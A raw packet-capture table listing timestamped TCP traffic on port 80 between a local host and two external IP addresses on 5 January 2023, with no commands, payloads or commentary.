                                                                                                                                                                                    Jan 5, 2023 08:58:21.390132904 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390152931 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390182018 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390189886 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390211105 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390242100 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390249968 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390269995 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390295982 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390307903 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390324116 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390350103 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390363932 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390378952 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390405893 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390418053 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390434027 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390458107 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390471935 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390485048 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390512943 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390521049 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390538931 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390563965 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390578032 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390592098 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390616894 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390626907 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390645981 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390671968 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390685081 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390710115 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390738010 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390749931 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390768051 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390794992 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390809059 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390821934 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390846014 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390856981 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390873909 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390898943 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390909910 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390927076 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390954971 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390961885 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390981913 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.391009092 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.391017914 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.391037941 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.391072989 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450294018 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450365067 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450412035 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450440884 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450457096 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450501919 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450514078 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450546026 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450589895 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450598001 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450634956 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450685024 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450716972 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450776100 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450823069 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450845003 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450867891 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450912952 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450925112 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.450961113 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.451004982 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.451011896 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.451049089 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.451095104 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.451105118 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.501063108 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.510332108 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.563524008 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.989449024 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:21.989522934 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.006964922 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.007029057 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.076919079 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.076970100 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.077040911 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.088100910 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.088202953 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.105645895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.105705023 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176153898 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176223993 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176258087 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176306963 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176353931 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176465988 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176465988 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176522017 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176693916 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176789045 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176788092 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176882029 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176911116 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.176955938 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.177463055 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.177521944 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.177573919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.177611113 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.177704096 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228753090 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228800058 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228832960 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228882074 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228912115 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228920937 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.228984118 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229047060 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229077101 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229099989 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229335070 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229373932 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229408979 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229423046 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229458094 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.229511976 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230149984 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230185032 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230222940 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230227947 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230273008 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230278969 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230952978 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.230988979 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231021881 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231050014 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231067896 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231075048 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231894970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231936932 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231969118 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.231998920 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.232013941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.232026100 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.232589960 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.232784033 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.282483101 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.282557011 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.282591105 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.282644033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.282711983 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.282785892 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283008099 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283019066 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283083916 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283129930 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283169031 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283195972 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283225060 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283595085 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283643961 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283689976 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283723116 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.283759117 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284490108 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284535885 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284567118 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284600019 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284600019 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284660101 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.284734011 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.285284996 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.285332918 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.285376072 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.285423040 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.285438061 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.285484076 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286118031 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286165953 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286210060 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286253929 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286274910 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286319017 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.286957979 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287013054 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287059069 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287103891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287131071 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287173033 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287760019 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287823915 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287868023 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287914038 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287940979 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.287983894 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.288573027 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.288625956 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.288671970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.288718939 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.288750887 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.288794994 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.289437056 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.289484978 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.289534092 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.289580107 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.289612055 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.289658070 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.290231943 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.290286064 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.290333033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.290379047 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.290400982 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.290445089 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.291050911 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.336244106 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.336301088 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.336394072 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.336901903 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.336951017 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.336987972 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337022066 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337075949 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337122917 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337136030 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337173939 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337420940 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337469101 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337512970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337557077 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337579012 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337611914 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.337622881 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338380098 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338454008 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338502884 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338542938 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338568926 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338577032 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338633060 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.338757992 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339381933 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339430094 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339512110 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339519024 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339579105 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339626074 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.339680910 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340246916 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340298891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340312958 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340365887 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340415001 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340461969 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340471983 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.340507984 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341269970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341319084 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341363907 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341382980 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341432095 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341480017 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.341505051 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342221022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342299938 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342312098 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342371941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342417955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342453003 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342463970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.342771053 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343184948 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343235970 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343282938 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343331099 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343372107 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343381882 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.343466997 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344192982 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344244003 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344279051 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344290972 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344336987 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344383001 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344419003 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.344487906 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:22.353679895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.353722095 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.353751898 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.353782892 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:22.353809118 CET4973780192.168.2.4188.114.97.3
